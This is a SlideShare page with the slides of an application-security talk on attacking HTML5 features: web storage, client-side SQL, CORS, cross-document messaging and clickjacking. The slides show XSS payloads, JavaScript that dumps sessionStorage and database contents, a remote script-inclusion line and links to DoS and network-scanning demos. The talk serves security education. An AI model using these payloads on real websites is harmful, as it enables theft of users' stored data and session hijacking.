SlideShare ist ein Scribd-Unternehmen logo

Html5 hacking

Iftach Ian Amit
Iftach Ian Amit

HTML5 Secur

Technologie
1 von 35
Downloaden Sie, um offline zu lesen
Attacking HTML5 Israel Chorzevski Application Security Consultant Israel@AppSec-Labs.com
Agenda  Introduction to HTML5  Attacking HTML5
Introduction to HTML5
Tags and Attributes  Element tags (canvas, video)  SEO tags (author, footer)  Attributes (autofocus, required)  CSS3 (selectors, 3D) Integration features  Geolocation  Drag & Drop files
Session Storage Cookie Session Storage Maximum size * 4 KB Some MB Content sent With any request Not sent Can be accessed from Any window Only the same window Always when window Deleted after Fixed time closed Range Per directory Whole site HttpOnly Flag Yes No * IE8 supports up to 10kb
Local Storage vs. Session Storage Session storage Local storage Maximum size 5 MB 10-15 MB Can be accessed from Only the same window Any window Deleted when Window is closed Not deleted Local Storage ~ AKA Global Storage
SQL Storage  SQLite ◦ Standard SQL  IndexedDB ◦ Object Oriented
Cross Origin Resource Sharing  The old methods: <iframe src=“http://site.com/home.htm”></iframe>  Stupid block <script src=“http://site.com/home.js”></script>  You run the script from another domain on your site!  The new method: AJAX with Cross Origin Policy  You have full control on the data and the combination with your site
Cross Document Messaging  Send messages between the main page and the iframes. Web Sockets  Open sockets and connections. Web Workers  Execute JS code under another thread.
Attacking HTML5
Storage attacks – Stealing Data  Goal ◦ Get Sensitive Data ◦ User Tracking  Technique ◦ An XSS anywhere in the application can be used to draw the data from site after the use. ◦ User leaves the computer after browsing to another site.
Storage attacks – Stealing Data  Vulnerabilities ◦ No HTTPONLY Flag ◦ No expiration date ◦ No directory separation  Cross directory attack ◦ Cross port attack (Chrome is protected)
Storage attacks – Dump data  Old XSS exploit <script>alert(document.cookie)</script>  New XSS exploit <script>alert(window.localStorage.key)</script>
Storage attacks – Dump data  Get values var ss = ""; for(i in window.sessionStorage) ss += i + " ";  Get names & values var ss = ""; for(i = 0; i < window.sessionStorage.length; i++) ss += window.sessionStorage.key(i) + ":" + sessionStorage.getItem(sessionStorage.key(i)) + " ";
Storage attacks – Spoofing data  Goal ◦ CSRF ◦ Denial of Service (data parsing crash) ◦ Stored XSS  Technique ◦ URL parameter – can be simply spoofed ◦ http://localhost:81/html5/storage/url-xss.htm?username=david ◦ Local event – can spoof by click jacking ◦ XSS somewhere in the application
SQL Storage attacks – Spoofing  SQL Injection ◦ Tweets updater: https://www.andlabs.org/html5/csSQLi.html  Persistent XSS by SQL (XSSQLI) ◦ No input validation, no output encoding https://www.andlabs.org/html5/csXSS1.html ◦ Input validation without Output encoding https://www.andlabs.org/html5/csXSS2.html
SQL Storage attacks – Dump data  Get objects (connected to the DB) var db = ""; for(i in window) if(window[i] == “[object Database]”) db += i + “ “;  Get tables: SELECT name FROM sqlite_master WHERE type='table‘
Storage attacks – Demo https://www.andlabs.org/html5/csSQLi.html http://localhost:81/html5/storage/draw.js document.write("<script src='http://localhost:81/html5/storage/draw.js'></script>");
Cross Origin Request - Technical  Origin header in the request  Origin header in the response
Cross Origin Request - Technical  Browser will send cookies along with the request, only if the request is set to send “credentials”: cor.open('GET', url); cor.withCredentials = "true"; cor.send();  Server answers with the header: Access-Control-Allow-Credentials: true  If server doesn't answer the credentials header (or answers false), the page will not load.  Access-Control-Allow-Origin can’t be * if credentials are marked as true.
Cross Origin Policy - Attacks  Scanning the internal network http://localhost:81/html5/COR/cor.php https://www.andlabs.org/tools/jsrecon.html  Accessing internal websites  Fast DDoS by POST method http://localhost:81/html5/COR/corDoS.php  Reverse CORS requests
Cross Document Messaging - Attacks  Demo ◦ http://c0-m0.victim-site.com/html5/postMessage/main.htm  Attacks ◦ XSS ◦ CSRF ◦ Information disclosure
Clickjacking  CSS3: ◦ var e = document.getElementById('iframe').style; ◦ e.ffilter = 'alpha(opacity=0.5)'; ◦ e.mag.opacity = 0.5;  Demo – lolcat generator: ◦ http://localhost:81/html5/click_jacking2/lolcat.php http://c0-m0.victim-site.com/php/clickjacking/
Clickjacking  The old protection (Frame-Busting) script: <script> if(top.location != self.location) top.location = self.location; </script>  Demo: http://localhost:81/html5/sandbox/open_iframe.php
Clickjacking - Sandbox  HTML: <iframe sandbox="" src="" ></iframe>  Options: ◦ allow-same-origin ◦ allow-top-navigation ◦ allow-forms ◦ allow-scripts  Demo: ◦ http://localhost:81/html5/sandbox/sandbox_iframe.php
Web Socket  http://slides.html5rocks.com/#web-sockets  http://html5demos.com/web-socket  https://www.andlabs.org/tools/ravan.html  https://www.andlabs.org/tools/jsrecon.html
Web Workers  main.js: var worker = new Worker('task.js'); worker.onmessage = function(event) { alert(event.data); }; worker.postMessage('data');  task.js: self.onmessage = function(event) { self.postMessage("recv'd: " + event.data); };  Test:  https://www.andlabs.org/tools/jsrecon.html  http://localhost:81/html5/COR/scanner/
Geolocation
Geolocation - Risk  User Tracking ◦ House burglars know when to strike. ◦ The anonymity of users could be broken.
Geolocation Risks – Mitigations  User needs to accept tracking for any site.  Opt-In ◦ Google Chrome:  Accept once IE9 FF5
Geolocation Risks – Private mode  IE9:  Google Chrome & FF5 Remember the accept of location sharing!  Google Developer: I'm tending towards WontFix. https://code.google.com/p/chromium/issues/detail?id=87387
New exploitation for old attacks  Vulnerability pharse: <input type=ʺtextʺ value=ʺ‐‐>Injecting hereʺ />  Before HTML5: ʺ onmouseover=ʺalert(0)  With HTML5: ʺ onfocus=ʺalert(0)ʺ autofocus= ʺ  Demo http://localhost:81/html5/new_exploits/xss.php
Summary  HTML5 adds features that allow new browser capabilities.  In this presentation we have demonstrated innovative ways for attackers to exploit & utilize these capabilities for malicious purposes.  Have fun playing & hacking with HTML5! 
Contact: Israel@AppSec-Labs.com

Empfohlen

Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Securitychuckbt
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
Injection flaw teaser
Injection flaw teaserInjection flaw teaser
Injection flaw teaserNotSoSecure Global Services
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesConviso Application Security
 
Web security for developers
Web security for developersWeb security for developers
Web security for developersSunny Neo
 
1000 to 0
1000 to 01000 to 0
1000 to 0Sunny Neo
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorMike Felch
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
 

Empfohlen

Html5 Application Security
Html5 Application SecurityHtml5 Application Security
Html5 Application Securitychuckbt
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
Injection flaw teaser
Injection flaw teaserInjection flaw teaser
Injection flaw teaserNotSoSecure Global Services
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesConviso Application Security
 
Web security for developers
Web security for developersWeb security for developers
Web security for developersSunny Neo
 
1000 to 0
1000 to 01000 to 0
1000 to 0Sunny Neo
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorMike Felch
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for PentestingMike Felch
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securitySecuRing
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud HackNotSoSecure Global Services
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levelsbeched
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)nyccamp
 
Rapid Android Application Security Testing
Rapid Android Application Security TestingRapid Android Application Security Testing
Rapid Android Application Security TestingNutan Kumar Panda
 
Evolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecurityEvolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecuritySanjeev Verma, PhD
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
CNIT 128 9. Writing Secure Android Applications
CNIT 128 9. Writing Secure Android ApplicationsCNIT 128 9. Writing Secure Android Applications
CNIT 128 9. Writing Secure Android ApplicationsSam Bowne
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)Mike Felch
 
Red Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterRed Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterMike Felch
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of themRoberto Suggi Liverani
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?snyff
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfdrewz lin
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linuxAjin Abraham
 
Post XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and RemediesPost XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and RemediesAdwiteeya Agrawal
 
Attacking HTML5
Attacking HTML5Attacking HTML5
Attacking HTML5AppSec_Labs
 
Talk about html5 security
Talk about html5 securityTalk about html5 security
Talk about html5 securityHuang Toby
 

Weitere ähnliche Inhalte

Was ist angesagt?

Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for PentestingMike Felch
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securitySecuRing
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levelsbeched
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)nyccamp
 
Rapid Android Application Security Testing
Rapid Android Application Security TestingRapid Android Application Security Testing
Rapid Android Application Security TestingNutan Kumar Panda
 
Evolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecurityEvolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecuritySanjeev Verma, PhD
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopPaul Ionescu
 
CNIT 128 9. Writing Secure Android Applications
CNIT 128 9. Writing Secure Android ApplicationsCNIT 128 9. Writing Secure Android Applications
CNIT 128 9. Writing Secure Android ApplicationsSam Bowne
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)Mike Felch
 
Red Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterRed Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterMike Felch
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of themRoberto Suggi Liverani
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?snyff
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X WayStephan Borosh
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfdrewz lin
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linuxAjin Abraham
 
Post XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and RemediesPost XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and RemediesAdwiteeya Agrawal
 

Was ist angesagt? (20)

Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
 
Big problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces securityBig problems with big data – Hadoop interfaces security
Big problems with big data – Hadoop interfaces security
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
 
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
Hack Into Drupal Sites (or, How to Secure Your Drupal Site)
 
Rapid Android Application Security Testing
Rapid Android Application Security TestingRapid Android Application Security Testing
Rapid Android Application Security Testing
 
Evolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser SecurityEvolution Of The Web Platform & Browser Security
Evolution Of The Web Platform & Browser Security
 
Secure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa WorkshopSecure Coding 101 - OWASP University of Ottawa Workshop
Secure Coding 101 - OWASP University of Ottawa Workshop
 
CNIT 128 9. Writing Secure Android Applications
CNIT 128 9. Writing Secure Android ApplicationsCNIT 128 9. Writing Secure Android Applications
CNIT 128 9. Writing Secure Android Applications
 
TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)TeelTech - Advancing Mobile Device Forensics (online version)
TeelTech - Advancing Mobile Device Forensics (online version)
 
Red Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite PerimeterRed Team Tactics for Cracking the GSuite Perimeter
Red Team Tactics for Cracking the GSuite Perimeter
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
 
Jwt == insecurity?
Jwt == insecurity?Jwt == insecurity?
Jwt == insecurity?
 
External to DA, the OS X Way
External to DA, the OS X WayExternal to DA, the OS X Way
External to DA, the OS X Way
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linux
 
Post XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and RemediesPost XSS Exploitation : Advanced Attacks and Remedies
Post XSS Exploitation : Advanced Attacks and Remedies
 

Ähnlich wie Html5 hacking

Talk about html5 security
Talk about html5 securityTalk about html5 security
Talk about html5 securityHuang Toby
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5DefconRussia
 
Persistent Offline Storage White
Persistent Offline Storage WhitePersistent Offline Storage White
Persistent Offline Storage WhiteAlexei White
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
HTML5 vs Silverlight
HTML5 vs SilverlightHTML5 vs Silverlight
HTML5 vs SilverlightMatt Casto
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Krzysztof Kotowicz
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontendOWASP EEE
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooNahidul Kibria
 
Dave Orchard - Offline Web Apps with HTML5
Dave Orchard - Offline Web Apps with HTML5Dave Orchard - Offline Web Apps with HTML5
Dave Orchard - Offline Web Apps with HTML5Web Directions
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
 
The Mobile Web - HTML5 on mobile devices
The Mobile Web - HTML5 on mobile devicesThe Mobile Web - HTML5 on mobile devices
The Mobile Web - HTML5 on mobile devicesWesley Hales
 
Browser security
Browser securityBrowser security
Browser securityUday Anand
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Ivo Andreev
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingColdFusionConference
 

Ähnlich wie Html5 hacking (20)

Attacking HTML5
Attacking HTML5Attacking HTML5
Attacking HTML5
 
Talk about html5 security
Talk about html5 securityTalk about html5 security
Talk about html5 security
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
 
Persistent Offline Storage White
Persistent Offline Storage WhitePersistent Offline Storage White
Persistent Offline Storage White
 
Sanjeev ghai 12
Sanjeev ghai 12Sanjeev ghai 12
Sanjeev ghai 12
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
HTML5 vs Silverlight
HTML5 vs SilverlightHTML5 vs Silverlight
HTML5 vs Silverlight
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontend
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
 
Dave Orchard - Offline Web Apps with HTML5
Dave Orchard - Offline Web Apps with HTML5Dave Orchard - Offline Web Apps with HTML5
Dave Orchard - Offline Web Apps with HTML5
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
 
The Mobile Web - HTML5 on mobile devices
The Mobile Web - HTML5 on mobile devicesThe Mobile Web - HTML5 on mobile devices
The Mobile Web - HTML5 on mobile devices
 
Browser security
Browser securityBrowser security
Browser security
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security Training
 
HTML5와 모바일
HTML5와 모바일HTML5와 모바일
HTML5와 모바일
 

Mehr von Iftach Ian Amit

Cyber Risk Quantification - CyberTLV
Cyber Risk Quantification - CyberTLVCyber Risk Quantification - CyberTLV
Cyber Risk Quantification - CyberTLVIftach Ian Amit
 
BSidesTLV Closing Keynote
BSidesTLV Closing KeynoteBSidesTLV Closing Keynote
BSidesTLV Closing KeynoteIftach Ian Amit
 
Social Media Risk Metrics
Social Media Risk MetricsSocial Media Risk Metrics
Social Media Risk MetricsIftach Ian Amit
 
From your Pocket to your Heart and Back
From your Pocket to your Heart and BackFrom your Pocket to your Heart and Back
From your Pocket to your Heart and BackIftach Ian Amit
 
Painting a Company Red and Blue
Painting a Company Red and BluePainting a Company Red and Blue
Painting a Company Red and BlueIftach Ian Amit
 
"Cyber" security - all good, no need to worry?
"Cyber" security - all good, no need to worry?"Cyber" security - all good, no need to worry?
"Cyber" security - all good, no need to worry?Iftach Ian Amit
 
Seeing Red In Your Future?
Seeing Red In Your Future?Seeing Red In Your Future?
Seeing Red In Your Future?Iftach Ian Amit
 
Passwords good badugly181212-2
Passwords good badugly181212-2Passwords good badugly181212-2
Passwords good badugly181212-2Iftach Ian Amit
 
Advanced Data Exfiltration - the way Q would have done it
Advanced Data Exfiltration - the way Q would have done itAdvanced Data Exfiltration - the way Q would have done it
Advanced Data Exfiltration - the way Q would have done itIftach Ian Amit
 
Infecting Python Bytecode
Infecting Python BytecodeInfecting Python Bytecode
Infecting Python BytecodeIftach Ian Amit
 
Cheating in Computer Games
Cheating in Computer GamesCheating in Computer Games
Cheating in Computer GamesIftach Ian Amit
 

Mehr von Iftach Ian Amit (20)

Cyber Risk Quantification - CyberTLV
Cyber Risk Quantification - CyberTLVCyber Risk Quantification - CyberTLV
Cyber Risk Quantification - CyberTLV
 
Devsecops at Cimpress
Devsecops at CimpressDevsecops at Cimpress
Devsecops at Cimpress
 
BSidesTLV Closing Keynote
BSidesTLV Closing KeynoteBSidesTLV Closing Keynote
BSidesTLV Closing Keynote
 
Social Media Risk Metrics
Social Media Risk MetricsSocial Media Risk Metrics
Social Media Risk Metrics
 
ISTS12 Keynote
ISTS12 KeynoteISTS12 Keynote
ISTS12 Keynote
 
From your Pocket to your Heart and Back
From your Pocket to your Heart and BackFrom your Pocket to your Heart and Back
From your Pocket to your Heart and Back
 
Painting a Company Red and Blue
Painting a Company Red and BluePainting a Company Red and Blue
Painting a Company Red and Blue
 
"Cyber" security - all good, no need to worry?
"Cyber" security - all good, no need to worry?"Cyber" security - all good, no need to worry?
"Cyber" security - all good, no need to worry?
 
Armorizing applications
Armorizing applicationsArmorizing applications
Armorizing applications
 
Seeing Red In Your Future?
Seeing Red In Your Future?Seeing Red In Your Future?
Seeing Red In Your Future?
 
Hacking cyber-iamit
Hacking cyber-iamitHacking cyber-iamit
Hacking cyber-iamit
 
Passwords good badugly181212-2
Passwords good badugly181212-2Passwords good badugly181212-2
Passwords good badugly181212-2
 
Bitcoin
BitcoinBitcoin
Bitcoin
 
Sexy defense
Sexy defenseSexy defense
Sexy defense
 
Cyber state
Cyber stateCyber state
Cyber state
 
Advanced Data Exfiltration - the way Q would have done it
Advanced Data Exfiltration - the way Q would have done itAdvanced Data Exfiltration - the way Q would have done it
Advanced Data Exfiltration - the way Q would have done it
 
Infecting Python Bytecode
Infecting Python BytecodeInfecting Python Bytecode
Infecting Python Bytecode
 
Exploiting Second life
Exploiting Second lifeExploiting Second life
Exploiting Second life
 
Dtmf phreaking
Dtmf phreakingDtmf phreaking
Dtmf phreaking
 
Cheating in Computer Games
Cheating in Computer GamesCheating in Computer Games
Cheating in Computer Games
 

Kürzlich hochgeladen

ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdfChristopherTHyatt
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
